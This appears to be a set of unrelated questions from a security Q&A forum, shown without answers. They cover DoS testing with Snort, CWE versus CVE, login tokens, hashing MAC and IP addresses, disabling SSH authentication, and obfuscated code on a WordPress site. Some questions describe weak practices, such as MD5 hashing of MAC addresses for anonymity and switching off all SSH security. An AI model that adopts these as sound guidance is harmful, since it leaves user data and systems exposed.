I was going to ask about how to educate users, but now that I think about it, I first want to know if it's actually possible to do effectively at all. Are there any amazing success (or horrible failure) stories floating around about user education, and different approaches thereto? Any statistics on whether companies that attempt to educate their user base about computer secure are, in fact, less likely to suffer a major compromise? My own experience is that people are often unwilling to alter their usage habits - especially more knowledgeable end users, who assume they know enough to avoid compromise. But my experience here is pretty limited, and based mostly on home/desktop use rather than office/workstation. I'm interested in hearing how this stuff plays out on a larger scale.
I need to set up an scenario where an attacker DoS attacks port 80 of an server while snort and others users try to connect to port 80 at the same time. Something like this: 1000 connections to port 80 800 analyzed by Snort 750 detected like DoS attack by Snort How can I get these values? What tools I need besides snort?
I am writing a paper on "The Role of Architecture and Design in Software Assurance" and a commenter asked "Provide a stronger case for using the CWE over the CVE. Explain how CVE vulnerabilities relate to the design phase and static code analysis." As the article is more for software engineers and developers, I am looking for an accurate, clear, and concise explanation that speaks to that audience.
The author of https://stackoverflow.com/a/477578/14731 recommends: DO NOT STORE THE PERSISTENT LOGIN COOKIE (TOKEN) IN YOUR DATABASE, ONLY A HASH OF IT! [...] use strong salted hashing (bcrypt / phpass) when storing persistent login tokens. I was under the impression that login cookies served two purposes: UX benefit: don't ask the user to login once per request Performance benefit: don't need to run a slow algorithm (like bcrypt) per request It seems the author is invalidating the second point, which makes me wonder: why bother with authentication tokens at all? Instead of mapping the username/password to a randomly-chosen authentication token, why not simply pass the username/password per request using a httpOnly, secure cookie? Assuming we accept the author's recommendation and use bcrypt per request, what's the advantage of using an authentication token instead a username/password?
Start with a unique identifier String macAddress = "CC:3A:61:24:D6:96"; Hash the identifier via MD5 implementation String hash = md5(macAddress); //bd37f780e10244cf28810b969559ad5b Remove all letters from the hash String result = hash.replaceAll("[^\\d.]", ""); result == "3778010244288109695595" I am using MD5 to anonymize MAC Addresses from our users. Our current web service does not accept letters for the value I wish to set, so I simply removed the letters. I am wary this will increase the chances of a collision within our database, so I come here with the question: How likely is it result will collide with a different macAddress input compared to hash?
I am trying to balance good security practices against excessive logging of user metadata / Personally Identifiable Information. I am constructing a web app that allows for secure messaging. In part of my system design, I am trying to minimize leaking of user metadata. Part of my system design includes a module that tracks IP addresses to prevent abuse, such as Denial-of-Service or account cracking. I only keep the log of IP addresses around as long as needed. A straightforward approach would be to log the IP address and a timestamp in a logfile, and delete entries after a period of time. To head off any distractions, the intent is to ban abusive IP addresses for a set amount of time (i.e., linear offset), not permanently. The threat model is that the logs could be used to determine who was using the system and when. I want the users of this system to have confidence that even if a server is compromised, that the logs are not designed in such a way that a third party could infer who used the system, and when, to talk to whom. My first thought was that storing information in a form that can be verified later, yet not stored in plaintext, is similar to how one securely stores system passwords using a key derivation function (i.e., applying a hash to a passphrase and a salt for a large number of iterations). Thus, the same way that a user password can be verified against its KDF-based hash, an IP can be checked against its KDF-based hash in the log file to see if the same IP address has been logged before. What are the strengths and weaknesses of this approach? Are there superior methods for storing user metadata / PII not in plaintext, in a format that a web app can verify? Updated to clarify web app purpose, and the threat model.
So I'm running a private subnet where there is no internet connectivity, I understand the grave danger of running an ssh server on the internet without security. In short I would like to be able to login to another machine on my subnet without entering a password or fumbling with rsa keys. So passwordless, but not passwordless in the traditional sense. To complicate the matter, I boot over the network, and the mechanism I am using to do so (Warewulf) does not easily allow me to add rsa keys to the root user. So I am looking for a way to disable all ssh security through the sshd_config and ssh_config files. Thanks.
I have a customer who wants me to "restore" his Wordpress page. I looked a little bit deeper in the codes and found the following code a few times in different files: http://pastebin.com/nL4i6t8x I'm not an expert in IT Security but for me this looks pretty much as "encrypted" code that does not belong to Wordpress. How can I analyze what this code does? I really need to know what it is before I can "clean" it. I'm interested to learn something about it so I'm very thankful for explanations what it is, what is does, where it (might) comes from and how to remove it. Thanks in advance!